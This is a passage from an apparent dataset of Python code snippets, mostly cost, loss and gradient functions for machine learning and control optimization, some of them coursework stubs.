np.concatenate((X_reshaped,np.zeros_like(X_reshaped)),axis=1)\r\n\r\n\r\n Times_pred_1 = np.concatenate((X_reshaped, np.ones_like(X_reshaped)-1), axis=1)\r\n noise_dict1 = {'output_index': Times_pred_1[:, 1:].astype(int)}\r\n Xpred, Xvar = gp.predict(Times_pred_1,Y_metadata=noise_dict1)\r\n\r\n Times_pred_2 = np.concatenate((X_reshaped, np.ones_like(X_reshaped)), axis=1)\r\n noise_dict2 = {'output_index': Times_pred_2[:, 1:].astype(int)}\r\n Ypred, Yvar = gp.predict(Times_pred_2,Y_metadata=noise_dict2)\r\n\r\n Times_pred_3 = np.concatenate((X_reshaped, np.ones_like(X_reshaped)+1), axis=1)\r\n noise_dict3 = {'output_index': Times_pred_3[:, 1:].astype(int)}\r\n Zpred, Zvar = gp.predict(Times_pred_3,Y_metadata=noise_dict3)\r\n\r\n return gp.log_predictive_density(X_list,Y_list) # ,Y_metadata=noise_dict1) # ARRAY OF ROW INDICES, ARRAY OF COLUMN INDICES, COST\r", "def getCostFunction(self, evalpts, observations, sigma=None, metric=lambda x: sum(x*x)):\n #XXX: better interface for sigma?\n def _(params):\n ind = 0\n for F, n, ofilt, icheck in zip(self._forwardFactories, self._inputs, \\\n self._outputFilters, self._inputCheckers):\n # check input #XXX: is this worthwile to do?\n my_params = params[ind:ind+n]\n checkQ = icheck(my_params, evalpts)\n if checkQ is not None:\n # some parameters are out of range... 
returns \"cost\"\n return checkQ\n\n Gm = F(params[ind:ind+n])\n if ind == 0:\n x = ofilt(Gm(evalpts)) \n else:\n x = x + ofilt(Gm(evalpts)) \n ind = ind+n\n if sigma is None:\n x = x - observations\n else:\n x = (x - observations) / sigma\n #return sum(real((conjugate(x)*x)))\n #return sum(x*x) \n return metric(x)\n return _", "def cost_function(x, N, w, dt):\n yh = np.abs(fftkernel(x, w / dt)) # density\n # formula for density\n C = np.sum(yh ** 2) * dt - 2 * np.sum(yh * x) * \\\n dt + 2 / np.sqrt(2 * np.pi) / w / N\n C = C * N * N\n # formula for rate\n # C = dt*sum( yh.^2 - 2*yh.*y_hist + 2/sqrt(2*pi)/w*y_hist )\n return C, yh", "def return_terminal_cost_func(TerminalCost='Minimize final angle',\n ReturnGradientAndHessian=False):\n if type(TerminalCost)==str:\n assert TerminalCost in ['Minimize final angle from target angle',\n 'Minimize final angular velocity from target angular velocity'],\\\n \"TerminalCost must be either 'Minimize final angle from target angle' (Default), 'Minimize final angular velocity from target angular velocity'.\"\n else:\n assert type(TerminalCost)==list, \"TerminalCost must be a list of cost types.\"\n for el in TerminalCost:\n assert type(el)==str, \"Each element of TerminalCost must be a string. Not \" + str(type(el)) + \".\"\n assert el in ['Minimize final angle from target angle',\n 'Minimize final angular velocity from target angular velocity'],\\\n \"Each element of TerminalCost must be either 'Minimize final angle from target angle' (Default), 'Minimize final angular velocity from target angular velocity'. '\" + el + \"' not accepted.\"\n\n if \"Minimize final angle from target angle\" in TerminalCost:\n result1 = lambda X,U,dt: k4*(1/2)*(X[0,-1]-TargetAngle)**2\n result1_grad = lambda X,U,dt:\\\n np.matrix([[k4*(X[0,-1]-TargetAngle)],[0]])\n result1_hess = lambda X,U,dt: np.matrix([[k4*1,0],[0,0]])\n else:\n result1 = lambda X,U,dt: 0\n result1_grad = lambda X,U,dt:\\\n np.matrix([[0],[0]])\n result1_hess = lambda X,U,dt: np.matrix([[0,0],[0,0]])\n\n if \"Minimize final angular velocity from target angular velocity\" in TerminalCost:\n result2 = lambda X,U,dt: k5*(1/2)*(X[1,-1]-TargetAngularVelocity)**2\n result2_grad = lambda X,U,dt:\\\n np.matrix([[0],[k5*(X[1,-1]-TargetAngularVelocity)]])\n result2_hess = lambda X,U,dt: np.matrix([[0,0],[0,k5*1]])\n else:\n result2 = lambda X,U,dt: 0\n result2_grad = lambda X,U,dt:\\\n np.matrix([[0],[0]])\n result2_hess = lambda X,U,dt: np.matrix([[0,0],[0,0]])\n\n result = lambda X,U,dt: result1(X,U,dt) \\\n + result2(X,U,dt)\n if ReturnGradientAndHessian:\n result_grad = lambda X,U,dt: result1_grad(X,U,dt) \\\n + result2_grad(X,U,dt)\n result_hess = lambda X,U,dt: result1_hess(X,U,dt) \\\n + result2_hess(X,U,dt)\n return(result,result_grad,result_hess)\n else:\n return(result)", "def evaluate_trajs(cost, states, controls):\n N = states.shape[0]\n T = controls.shape[1]\n costs = np.zeros(N)\n for i, (x, u) in enumerate(zip(states, controls)):\n for t in range(T):\n costs[i] += cost.stage_cost(x[t],u[t])\n costs[i] += cost.terminal_cost(x[T])\n \n return costs", "def compute_cost(AL, Y):\n pass", "def gradient_descent(features, values, theta, alpha, num_iterations):\r\n\r\n m = len(values)\r\n cost_history = []\r\n\r\n for i in range (num_iterations):\r\n \r\n h = numpy.dot(features, theta)\r\n \r\n theta = theta - alpha / m * numpy.dot((h-values),features)\r\n \r\n cost = compute_cost(features, values, theta)\r\n \r\n cost_history.append(cost)\r\n\r\n return theta, pandas.Series(cost_history) # leave this line 
for the grader\r", "def return_running_cost_func(RunningCost='Minimize Input Energy'):\n if type(RunningCost)==str:\n assert RunningCost in ['Minimize Input Energy',\n 'Minimize time away from target angle',\n 'Minimize time away from target angular velocity'],\\\n \"RunningCost must be either 'Minimize Input Energy','Minimize time away from target angle', or 'Minimize time away from target angular velocity'.\"\n else:\n assert type(RunningCost)==list, \"RunningCost must be a list of cost types.\"\n for el in RunningCost:\n assert type(el)==str, \"Each element of RunningCost must be a string. Not \" + str(type(el)) + \".\"\n assert el in ['Minimize Input Energy',\n 'Minimize time away from target angle',\n 'Minimize time away from target angular velocity'],\\\n \"Each element of RunningCost must be either 'Minimize Input Energy','Minimize time away from target angle', or 'Minimize time away from target angular velocity'. '\" + el + \"' not accepted.\"\n\n if \"Minimize Input Energy\" in RunningCost:\n result1 = lambda X,U,dt: np.trapz((k3/2)*U**2,dx=dt)\n else:\n result1 = lambda X,U,dt: 0\n\n if \"Minimize time away from target angle\" in RunningCost:\n result2 = lambda X,U,dt: np.trapz(k1*(1/2)*(X[0,1:]-TargetAngle)**2,dx=dt)\n else:\n result2 = lambda X,U,dt: 0\n\n if \"Minimize time away from target angular velocity\" in RunningCost:\n result3 = lambda X,U,dt:\\\n np.trapz(k2*(1/2)*(X[1,1:]-TargetAngularVelocity)**2,dx=dt)\n else:\n result3 = lambda X,U,dt: 0\n\n result = lambda X,U,dt: result1(X,U,dt) \\\n + result2(X,U,dt) \\\n + result3(X,U,dt)\n return(result)", "def getVectorCostFunction(self, evalpts, observations):\n def _(params):\n forward = self.getForwardEvaluator(evalpts)\n return sum(forward(params) - observations)\n return _", "def cost(self, cost_object, target):\n\n return cost_object.f(self.a[-1], target).mean(axis=0).sum()", "def checkCostFunction(lbd=0):\n # Create small problem\n X_t = np.random.rand(4, 3)\n Theta_t = np.random.rand(5, 3)\n\n # Zap out most entries\n Y = X_t.dot(Theta_t.T)\n Y[np.random.rand(Y.shape[0], Y.shape[1]) > .5] = 0\n R = np.zeros(Y.shape)\n R[Y == 0] = 1\n\n # Run Gradient Checking\n X = np.random.randn(X_t.shape[0], X_t.shape[1])\n Theta = np.random.randn(Theta_t.shape[0], Theta_t.shape[1])\n num_users = Y.shape[1]\n num_movies = Y.shape[0]\n num_features = Theta_t.shape[1]\n\n def Jfunc(t):\n return cofiCostFunc(t, Y, R, num_users, num_movies, num_features, lbd)\n\n numgrad = computeNumericalGradient(Jfunc, np.r_[X.flatten(), Theta.flatten()])\n\n cost, grad = cofiCostFunc(np.r_[X.flatten(), Theta.flatten()], Y, R, num_users, num_movies, num_features, lbd)\n\n print(np.c_[numgrad, grad])\n print('The above two columns you get should be very similar.')\n print('(Left-Your Numerical Gradient, Right-Analytical Gradient)\\n')\n\n diff = np.linalg.norm(numgrad-grad)/np.linalg.norm(numgrad+grad)\n print('If your cost function implementation is correct, then')\n print('the relative difference will be small (less than 1e-9).')\n print('Relative Difference: %g\\n' % diff)", "def compute_cost(AL,Y,cost_function_name):\n cost_functions = {\n \"cost_func_1\": cf.cost_function_1\n } \n\n activ_func = cost_functions.get(cost_function_name,lambda : \"Invalid Cost Function Name !\")\n\n cost,dAL = activ_func(AL,Y)\n\n return cost, dAL", "def get_cost(self, Y, T):\n return - np.multiply(T, np.log(Y)).sum() / Y.shape[0]", "def compute_cost(self,X, y):\n \n num_samples = len(X)\n # Do Forward propagation to calculate our predictions\n z1 = X.dot(self.W1) + 
self.b1\n a1 = np.tanh(z1)\n z2 = a1.dot(self.W2) + self.b2\n exp_z = np.exp(z2)\n a2 = exp_z / np.sum(exp_z, axis=1, keepdims=True)\n softmax_scores = a2\n # Calculate the cross-entropy loss\n cross_ent_err = -np.log(softmax_scores[range(num_samples), y])\n data_loss = np.sum(cross_ent_err)\n return 1./num_samples * data_loss", "def eval_costfunc(V=None, W=None, R=None, cmat=None, ystar=None,\n bmat=None, tbmat=None,\n tmesh=None, veldict=None, fbftdict=None,\n penau=True):\n\n def _dywdy(t, V=None):\n cvel = np.load(veldict[t]+'.npy')\n delty = ystar(t) - lau.mm_dnssps(cmat, cvel)\n if V is None:\n return np.dot(delty.T, lau.mm_dnssps(W, delty))\n else:\n return np.dot(delty.T, lau.mm_dnssps(V, delty))\n\n def _uru(t):\n if not penau:\n return 0\n cvel = np.load(veldict[t]+'.npy')\n if R is None and tbmat is not None:\n try:\n curfb = np.dot(np.load(fbftdict[t]['mtxtb']+'.npy').T, cvel)\n curft = tbmat.T*np.load(fbftdict[t]['w']+'.npy')\n except KeyError:\n curfb = np.dot(np.load(fbftdict[None]['mtxtb']+'.npy').T, cvel)\n curft = tbmat.T*np.load(fbftdict[None]['w']+'.npy')\n return np.dot((curfb+curft).T, curfb+curft)\n else:\n raise NotImplementedError()\n\n cts = tmesh[1] - tmesh[0]\n # time int by pw trapezoidal rule\n cfv = 0\n ccfv_old = _dywdy(tmesh[0]) + _uru(tmesh[0])\n for k, t in enumerate(tmesh[1:]):\n cts = t - tmesh[k]\n ccfv_new = _dywdy(t) + _uru(t)\n cfv += 0.5*cts*(ccfv_new + ccfv_old)\n ccfv_old = ccfv_new\n # final pena value\n cfv += _dywdy(tmesh[-1], V=V)\n return cfv", "def return_quadratic_cost_function_expansion_variables(\n X,U,dt,\n RunningCost=\"Minimize Input Energy\"):\n\n if type(RunningCost)==str:\n assert RunningCost in ['Minimize Input Energy',\n 'Minimize time away from target angle',\n 'Minimize time away from target angular velocity'],\\\n \"RunningCost must be either 'Minimize Input Energy','Minimize time away from target angle', or 'Minimize time away from target angular velocity'.\"\n else:\n assert type(RunningCost)==list, \"RunningCost must be a list of cost types.\"\n for el in RunningCost:\n assert type(el)==str, \"Each element of RunningCost must be a string. Not \" + str(type(el)) + \".\"\n assert el in ['Minimize Input Energy',\n 'Minimize time away from target angle',\n 'Minimize time away from target angular velocity'],\\\n \"Each element of RunningCost must be either 'Minimize Input Energy','Minimize time away from target angle', or 'Minimize time away from target angular velocity'. 
'\" + el + \"' not accepted.\"\n\n # returns a list of length len(Time)-1, each element with shape (1,1), where n is the number of states.\n l_func = return_l_func(RunningCost=RunningCost)\n l = list(\n map(\n lambda X,U: l_func(X,U,dt),\n X[:,1:].T,\n U\n )\n )\n\n # returns a list of length len(Time)-1, each element with shape (n,1), where n is the number of states.\n lx_func = return_lx_func(RunningCost=RunningCost)\n lx = list(\n map(\n lambda X,U: lx_func(X,U,dt),\n X[:,1:].T,\n U\n )\n )\n\n # returns a list of length len(Time)-1, each element with shape (m,1), where n is the number of states.\n lu_func = return_lu_func(RunningCost=RunningCost)\n lu = list(\n map(\n lambda X,U: lu_func(X,U,dt),\n X[:,1:].T,\n U\n )\n )\n\n # returns a list of length len(Time)-1, each element with shape (m,n), where m is the number of inputs and n is the number of states.\n lux_func = return_lux_func(RunningCost=RunningCost)\n lux = list(\n map(\n lambda X,U: lux_func(X,U,dt),\n X[:,1:].T,\n U\n )\n )\n\n # returns a list of length len(Time)-1, each element with shape (n,m), where n is the number of states and m is the number of inputs.\n lxu_func = return_lxu_func(RunningCost=RunningCost)\n lxu = list(\n map(\n lambda X,U: lxu_func(X,U,dt),\n X[:,1:].T,\n U\n )\n )\n\n # returns a list of length len(Time)-1, each element with shape (m,m), where m is the number of inputs.\n luu_func = return_luu_func(RunningCost=RunningCost)\n luu = list(\n map(\n lambda X,U: luu_func(X,U,dt),\n X[:,1:].T,\n U\n )\n )\n\n # returns a list of length len(Time)-1, each element with shape (n,n), where n is the number of states.\n lxx_func = return_lxx_func(RunningCost=RunningCost)\n lxx = list(\n map(\n lambda X,U: lxx_func(X,U,dt),\n X[:,1:].T,\n U\n )\n )\n\n return(l,lx,lu,lux,lxu,luu,lxx)", "def cost_function(self, X, y, theta_list, bias):\n total_samples = len(y)\n loss = 0\n\n for i in range(total_samples):\n hypothesis = bias\n hypothesis += np.matmul(X[i], np.array(theta_list).T)\n \n de = 1.0 + np.exp(-hypothesis)\n sigmoidhypothesis = 1.0/de\n\n loss += (y[i]*np.log(sigmoidhypothesis)) + ((1-y[i])*(np.log(1 - sigmoidhypothesis)))\n\n return -1 * (loss/total_samples) #loss calculation", "def SGD_ce(data, labels, eta_0, T):\n data = sklearn.preprocessing.normalize(data)\n w = np.zeros((10,784))\n for t in range(1, T + 1):\n i = np.random.randint(len(data))\n w = w - (eta_0) * grad(w, data[i], labels[i])\n return w", "def gradient_descent(features, values, theta, alpha, num_iterations):\n m = len(values)\n cost_history = []\n\n for i in range(num_iterations):\n predicted_values = np.dot(features, theta)\n delta = alpha / m * np.dot((predicted_values - values), features)\n theta = theta - delta\n cost = compute_cost(features, values, theta)\n cost_history.append(cost)\n return theta, pandas.Series(cost_history)", "def learn_thetas(self, X, Y):\n \n thetas0 = self.reshape_thetas(self.thetas, 'vector')\n res = minimize(self._objective_function, thetas0, args=(X, Y), method='Newton-CG', jac=True,\n options = {'disp': False, 'maxiter': 400})\n \n self.thetas = self.reshape_thetas(res.x, 'list')", "def crps_cost_function(y_true, y_pred, theano=False):\n\n # Split input\n mu = y_pred[:, 0]\n sigma = y_pred[:, 1]\n # Ugly workaround for different tensor allocation in keras and theano\n if not theano:\n y_true = y_true[:, 0] # Need to also get rid of axis 1 to match!\n\n # To stop sigma from becoming negative we first have to convert it the the variance and then take the square root again. 
\n var = K.square(sigma)\n # The following three variables are just for convenience\n loc = (y_true - mu) / K.sqrt(var)\n phi = 1.0 / np.sqrt(2.0 * np.pi) * K.exp(-K.square(loc) / 2.0)\n Phi = 0.5 * (1.0 + tf.math.erf(loc / np.sqrt(2.0)))\n # First we will compute the crps for each input/target pair\n crps = K.sqrt(var) * (loc * (2. * Phi - 1.) + 2 * phi - 1. / np.sqrt(np.pi))\n # Then we take the mean. The cost is now a scalar\n \n return K.mean(crps)", "def nnCostFunction2(nn_params, input_layer_size, hidden_layer_size, num_labels, X, y, lambda_):\n # Reshape nn_params back into the parameters Theta1 and Theta2, the weight matrices\n # for our 2 layer neural network\n Theta1 = nn_params[:hidden_layer_size * (input_layer_size + 1)].reshape(\n (hidden_layer_size, input_layer_size + 1))\n Theta2 = nn_params[hidden_layer_size *\n (input_layer_size + 1):].reshape((num_labels, hidden_layer_size + 1))\n\n # Setup some useful variables\n m = X.shape[0]\n\n # Add ones to the X data matrix\n X = np.insert(X, 0, 1, axis=1)\n\n # Perform forward propagation for layer 2\n z2 = np.matmul(X, Theta1.transpose())\n a2 = sigmoid(z2)\n a2 = np.insert(a2, 0, 1, axis=1)\n z3 = np.matmul(a2, Theta2.transpose())\n a3 = sigmoid(z3)\n\n # turn Y into a matrix with a new column for each category and marked with 1\n y_one_hot = np.zeros_like(a3)\n for i in range(m):\n y_one_hot[i, y[i] - 1] = 1\n\n # Calculate the cost of our forward prop\n ones = np.ones_like(a3)\n A = np.matmul(y_one_hot.transpose(), np.log(a3)) + \\\n np.matmul((ones - y_one_hot).transpose(), np.log(ones - a3))\n J = -1 / m * A.trace()\n J += lambda_ / (2 * m) * \\\n (np.sum(Theta1[:, 1:] ** 2) + np.sum(Theta2[:, 1:] ** 2))\n\n # Perform backward propagation to calculate deltas & gradients\n delta3 = a3 - y_one_hot\n delta2 = np.matmul(delta3, Theta2[:, 1:]) * sigmoidGradient(z2)\n Theta2_grad = np.matmul(a2.transpose(), delta3).transpose()\n Theta1_grad = np.matmul(X.transpose(), delta2).transpose()\n\n Theta1_grad[:, 1:] += lambda_ * Theta1[:, 1:]\n Theta2_grad[:, 1:] += lambda_ * Theta2[:, 1:]\n Theta1_grad /= m\n Theta2_grad /= m\n grad = np.concatenate([Theta1_grad.reshape(-1), Theta2_grad.reshape(-1)])\n return J, grad", "def compute_cost(y, tx, w, method=\"mae\"):\n err = y - tx.dot(w)\n if method.lower() == \"mae\":\n cost_f = np.mean(np.abs(err))\n elif method.lower() == \"mse\":\n cost_f = np.mean(err**2)/2\n else:\n return NotImplementedError\n return cost_f", "def gradient_descent(features, values, theta, alpha, num_iterations):\r\n \r\n m = len(values)\r\n cost_history = []\r\n\r\n for i in range(num_iterations):\r\n # your code here\r\n cost = compute_cost(features, values, theta)/(2.0*m)\r\n cost_history.append([cost])\r\n \r\n error = features.dot(theta) - values\r\n error = np.reshape(error,(error.shape[0], 1))\r\n errorWeighted = features*error\r\n errorSum = (np.sum(errorWeighted,0))/(m*1.0)\r\n theta = theta - alpha*errorSum \r\n \r\n return theta, pandas.Series(cost_history)", "def cost_func(plist):\n\t\tgamma, alpha = plist\n\t\tk = ac.Moffat2DKernel(gamma, alpha, x_size=nx, y_size=ny)\n\n\t\tarr_out_predict = ac.convolve(arr_in, k)\n\n\t\tarr_out_fit, arr_out_predict_fit = match_dimension(arr_out, arr_out_predict)\n\t\tdiff = (arr_out_fit - arr_out_predict_fit)*scale_factor\n\n\t\treturn np.sum(diff**2)/diff.size", "def compute_cost_function(X, Y, theta, lambda_factor, temp_parameter):\n h = compute_probabilities(X, theta, temp_parameter)\n\n cost = 0\n for i in range(X.shape[0]):\n for j in range(theta.shape[0]):\n if 
Y[i] == j:\n cost += np.log(h[j,i])\n\n cost = -cost / X.shape[0]\n\n theta = np.power(theta, 2)\n\n cost += lambda_factor / 2 * theta.sum()\n\n return cost", "def compute_gradients(self, logits, target):\n\n target_length = target.shape[0]\n num_time_steps = logits.shape[0]\n\n\t\t######################\n\t\t### YOUR CODE HERE ###\n\t\t######################\n\n # expand labels by inserting a blank between each pair\n normalized_logits = softmax(logits)\n blank_label = normalized_logits.shape[1] - 1\n l = add_blanks(target, blank_label)\n target_length = l.shape[0]\n\n alpha = self.compute_forward_variables(normalized_logits, target) \n beta = self.compute_backward_variables(normalized_logits, target)\n\n # rescale\n alpha = alpha / np.sum(alpha, axis=0)\n beta = beta / np.sum(beta, axis=0)\n alphabeta = alpha * beta\n print \"alpha\"\n print alpha\n\n # compute zt\n z = Counter()\n for t in xrange(num_time_steps):\n for s, k in enumerate(l):\n z[t] += alphabeta[s, t] / normalized_logits[t, k]\n \n # normalized_logits is time steps t by labels k\n # alpha is 2 * target_length - 1 by time steps\n lab_zk = np.zeros_like(normalized_logits)\n for s, k in enumerate(l):\n for t in xrange(num_time_steps):\n lab_zk[t, k] += alphabeta[s, t]\n\n grad = normalized_logits\n for k in xrange(target.shape[0]):\n for t in xrange(num_time_steps):\n ytk = normalized_logits[t, k]\n constant = 1.0 / (ytk * z[t])\n grad[t, k] = ytk - constant * lab_zk[t, k]\n \n return grad", "def calculate_cost(x, y, weights):\r\n predictions = compute_prediction(x, weights)\r\n cost = np.mean(-y * np.log(predictions) - (1 - y) * np.log(1 - predictions))\r\n return cost", "def compute_gradient(\n *,\n source_states,\n task,\n compute_phi,\n compute_psi,\n params,\n key,\n method,\n oracle_states,\n lissa_kappa,\n main_batch_size,\n covariance_batch_size,\n weight_batch_size,\n d,\n compute_feature_norm_on_oracle_states,\n sample_states,\n use_tabular_gradient = True,\n):\n # The argument passed to vjp should be a function of parameters\n # to Phi.\n phi_params = params['phi_params']\n source_phi, phi_vjp = jax.vjp(\n lambda params: compute_phi(params, source_states), phi_params\n )\n\n # We needed compute_phi to take params as an argument to work out\n # gradients w.r.t the parameters in the vjp above. However,\n # for future use we can just wrap the parameters up in the function\n # for other usage.\n compute_phi_no_params = functools.partial(compute_phi, phi_params)\n\n if method == 'lissa' and compute_feature_norm_on_oracle_states:\n oracle_phis = compute_phi(phi_params, oracle_states) # pytype: disable=wrong-arg-types # jax-ndarray\n feature_norm = utils.compute_max_feature_norm(oracle_phis)\n else:\n feature_norm = None\n\n # This determines the weight vectors to be used to perform the gradient step.\n if method == 'explicit':\n # With the explicit method we maintain a running weight vector.\n explicit_weight_matrix = params['explicit_weight_matrix']\n weight_1 = jnp.squeeze(explicit_weight_matrix[:, task], axis=1)\n weight_2 = jnp.squeeze(explicit_weight_matrix[:, task], axis=1)\n else: # Implicit methods.\n if method == 'oracle':\n # This exactly determines the covariance in the tabular case,\n # i.e. 
when oracle_states = S.\n Phi = compute_phi_no_params(oracle_states)\n num_states = oracle_states.shape[0]\n\n covariance_1 = jnp.linalg.pinv(Phi.T @ Phi) * num_states\n covariance_2 = covariance_1\n\n # Use all states for weight vector.\n weight_states_1 = oracle_states\n weight_states_2 = weight_states_1\n if method == 'naive':\n # The naive method uses one covariance matrix for both weight vectors.\n covariance_1, key = estimates.naive_inverse_covariance_matrix(\n compute_phi_no_params, sample_states, key, d, covariance_batch_size\n )\n covariance_2 = covariance_1\n\n weight_states_1, key = sample_states(key, weight_batch_size)\n weight_states_2 = weight_states_1\n elif method == 'naive++':\n # The naive method uses one covariance matrix for both weight vectors.\n covariance_1, key = estimates.naive_inverse_covariance_matrix(\n compute_phi_no_params, sample_states, key, d, covariance_batch_size\n )\n covariance_2, key = estimates.naive_inverse_covariance_matrix(\n compute_phi_no_params, sample_states, key, d, covariance_batch_size\n )\n\n weight_states_1, key = sample_states(key, weight_batch_size)\n weight_states_2, key = sample_states(key, weight_batch_size)\n elif method == 'lissa':\n # Compute two independent estimates of the inverse covariance matrix.\n covariance_1, key = estimates.lissa_inverse_covariance_matrix(\n compute_phi_no_params,\n sample_states,\n key,\n d,\n covariance_batch_size,\n lissa_kappa,\n feature_norm=feature_norm,\n )\n covariance_2, key = estimates.lissa_inverse_covariance_matrix(\n compute_phi_no_params,\n sample_states,\n key,\n d,\n covariance_batch_size,\n lissa_kappa,\n feature_norm=feature_norm,\n )\n\n # Draw two separate sets of states for the weight vectors (important!)\n weight_states_1, key = sample_states(key, weight_batch_size)\n weight_states_2, key = sample_states(key, weight_batch_size)\n\n # Compute the weight estimates by combining the inverse covariance\n # estimate and the sampled Phi & Psi's.\n weight_1 = (\n covariance_1\n @ compute_phi(phi_params, weight_states_1).T # pytype: disable=wrong-arg-types # jax-ndarray\n @ compute_psi(weight_states_1, task)\n ) / len(weight_states_1)\n weight_2 = (\n covariance_2\n @ compute_phi(phi_params, weight_states_2).T # pytype: disable=wrong-arg-types # jax-ndarray\n @ compute_psi(weight_states_2, task)\n ) / len(weight_states_2)\n\n prediction = jnp.dot(source_phi, weight_1)\n estimated_error = prediction - compute_psi(source_states, task)\n\n if use_tabular_gradient:\n # We use the same weight vector to move all elements of our batch, but\n # they have different errors.\n partial_gradient = jnp.reshape(\n jnp.tile(weight_2, main_batch_size), (main_batch_size, d)\n )\n\n # Line up the shapes of error and weight vectors so we can construct the\n # gradient.\n expanded_estimated_error = jnp.expand_dims(estimated_error, axis=1)\n partial_gradient = partial_gradient * expanded_estimated_error\n\n # Note: this doesn't work for duplicate indices. However, it shouldn't\n # add any bias to the algorithm, and is faster than checking for\n # duplicate indices. 
Most of the time we care about the case where our\n # batch size is much smaller than the number of states, so duplicate\n # indices should be rare.\n phi_gradient = jnp.zeros_like(phi_params)\n phi_gradient = phi_gradient.at[source_states, :].set(partial_gradient)\n else:\n # Calculate implicit gradient (Phi @ w_1 - Psi) @ w_2.T\n implicit_gradient = jnp.outer(estimated_error, weight_2)\n # Pullback implicit gradient to get the full Phi gradient.\n (phi_gradient,) = phi_vjp(implicit_gradient)\n gradient = {'phi_params': phi_gradient}\n\n if method == 'explicit':\n weight_gradient = source_phi.T @ estimated_error\n expanded_gradient = jnp.expand_dims(weight_gradient, axis=1)\n\n explicit_weight_matrix = params['explicit_weight_matrix']\n explicit_weight_gradient = jnp.zeros_like(explicit_weight_matrix)\n explicit_weight_gradient = explicit_weight_gradient.at[:, task].set(\n expanded_gradient\n )\n gradient['explicit_weight_matrix'] = explicit_weight_gradient\n\n return gradient, key", "def getCostFunctionSlow(self, evalpts, observations):\n #XXX: update interface to allow metric?\n def _(params):\n v = self.getVectorCostFunction(evalpts, observations)\n x = v(params)\n return sum(real((conjugate(x)*x)))\n return _", "def _construct_reg_costs(self):\n param_reg_cost = sum([T.sum(p**2.0) for p in self.joint_params])\n return param_reg_cost", "def gradient_descent(features, values, theta, alpha, num_iterations):\n \n # number of points\n npoints = len(values)\n \n # intialize cost history\n cost_history = []\n \n # num_interations iterations\n for iiter in range(num_iterations):\n \n # compute and store cost\n cost = compute_cost(features, values, theta)\n cost_history.append(cost)\n \n # update values of theta\n values_predicted = np.dot(features, theta)\n theta = theta + (alpha/npoints)*(np.dot(values - values_predicted,features))\n \n return theta, pandas.Series(cost_history)", "def _get_cost(self):\n logging.info(\"Cost: {}\".format(self.cost_function.name))\n\n with tf.name_scope(\"cost\"):\n\n if self.cost_function == Cost.BATCH_DICE_LOG or self.cost_function == Cost.BATCH_DICE_SOFT or \\\n self.cost_function == Cost.BATCH_DICE_SOFT_CE:\n # calculate Dice loss over the complete batch (take batch as pseudo 3d Tensor)\n if self._n_class == 1:\n # if nr classes is 1 axis 3 has only one component\n axis = (0, 1, 2, 3)\n else:\n axis = (0, 1, 2)\n else:\n # compute dice for each slice and take average (normally not used but considered as option)\n if self._n_class == 1:\n axis = (1, 2, 3)\n else:\n axis = (1, 2)\n # flatten input and outpout\n flat_logits = tf.reshape(self.logits, [-1, self._n_class])\n flat_labels = tf.reshape(self.y, [-1, self._n_class])\n\n # cross entropy loss\n if self.cost_function == Cost.CROSS_ENTROPY:\n # if class weights are None cross entropy will not be weighted\n loss = tfu.get_cross_entropy(logits=flat_logits, y=flat_labels, n_class=self._n_class,\n weights=self._class_weights_ce)\n # Dice loss\n elif self.cost_function == Cost.DICE_SOFT or self.cost_function == Cost.BATCH_DICE_SOFT:\n loss = 1.0 - tfu.get_dice_loss(logits=self.logits, y=self.y, axis=axis,\n weights=self._class_weights_dice, exclude_zero_label=False)\n # Weighted combination of dice and cross entropy\n elif self.cost_function == Cost.DICE_SOFT_CE or self.cost_function == Cost.BATCH_DICE_SOFT_CE:\n loss = self._loss_weight * (1.0 - tfu.get_dice_loss(logits=self.logits, y=self.y, axis=axis,\n weights=self._class_weights_dice,\n exclude_zero_label=False))\n loss += (1.0 - self._loss_weight) * 
tfu.get_cross_entropy(logits=flat_logits, y=flat_labels,\n n_class=self._n_class,\n weights=self._class_weights_ce)\n # Dice log loss (-log(dice_score)). Considered to have nicer gradient.\n # But seems to be not realy more valuable in real life\n elif self.cost_function == Cost.DICE_LOG or self.cost_function == Cost.BATCH_DICE_LOG:\n loss = tfu.get_dice_log_loss(self.logits, self.y, axis=axis, exclude_zero_label=False)\n\n # MSE loss used for regression tasks\n elif self.cost_function == Cost.MSE:\n loss = tf.losses.mean_squared_error(flat_logits, flat_labels)\n\n # TV loss (MSE + total variation of output as regularizer). Seems to not work very\n elif self.cost_function == Cost.TV:\n loss = tf.losses.mean_squared_error(flat_logits, flat_labels)\n tv = tf.reduce_sum(tf.image.total_variation(self.logits))\n loss += self._tv_regularizer * tv\n else:\n raise ValueError(\"Unknown cost function: \" % self.cost_function.name)\n\n # if value for l1 or l2 regularizer is given add them to the loss\n if self._l2_regularizer is not None:\n self.l2regularizers = self._l2_regularizer * sum(\n [tf.nn.l2_loss(variable) for variable in self.variables])\n loss += self.l2regularizers\n if self._l1_regularizer is not None:\n self.l1regularizers = self._l1_regularizer * sum([\n tf.reduce_sum(tf.abs(variable)) for variable in self.variables])\n loss += self.l1regularizers\n\n return loss", "def fixed_cost(self):\n return np.einsum('i->', self.c[self.f])", "def compute_cost(AL, Y, parameters ,lambd):\n L = len(parameters) // 2\n m = Y.shape[1]\n cost = -1 / m * np.sum(np.nan_to_num(Y * np.log(AL) + (1-Y) * np.log(1-AL)))\n cost+= 0.5*(lambd/m)*sum(np.linalg.norm(parameters['W' + str(i)])**2 for i in range(1,L))\n return cost", "def compute(self, inputs):\n\t\tres = inputs\n\t\tfor layer in range(self.layersNumber):\n\t\t\tweight = self.weights[layer]\n\t\t\tbias = self.biases[layer]\n\t\t\tres = fActivation(np.dot(weight, res) + bias)\n\t\treturn res", "def cost(self, output, labels, weights):\n raise NotImplementedError('Must be overridden by concrete subclass')", "def CostFunction(self, out, V, P, params):\n u = self.u\n p = self.p\n puni = self.puni\n xd = self.xd\n xa = self.xa\n l = self.l\n Lagrange_Tracking = 0\n Lagrange_Regularisation = 0\n\n # input regularization\n for name in set(u.keys()):\n Lagrange_Regularisation += puni['weights',name][0]*ca.mtimes((u[name]-p['ref',name]).T,u[name]-p['ref',name])\n\n Lagrange_Regularisation += puni['weights','AoA']*out['AoA']**2\n Lagrange_Regularisation += puni['weights','sslip']*out['sslip']**2\n\n # --- Initialization tracking\n for name in set(xd.keys())- set(['R','E','Drag']):\n Lagrange_Tracking += puni['weights',name][0]*ca.mtimes((xd[name]-p['ref',name]).T,xd[name]-p['ref',name])\n for k in range(9):\n Lagrange_Tracking += ca.reshape(puni['weights','R'][0]*ca.mtimes((xd['R']-p['ref','R']).T,xd['R']-p['ref','R']),9,1)[k]\n\n\n Lagrange_Tracking = ca.Function('lagrange_track', 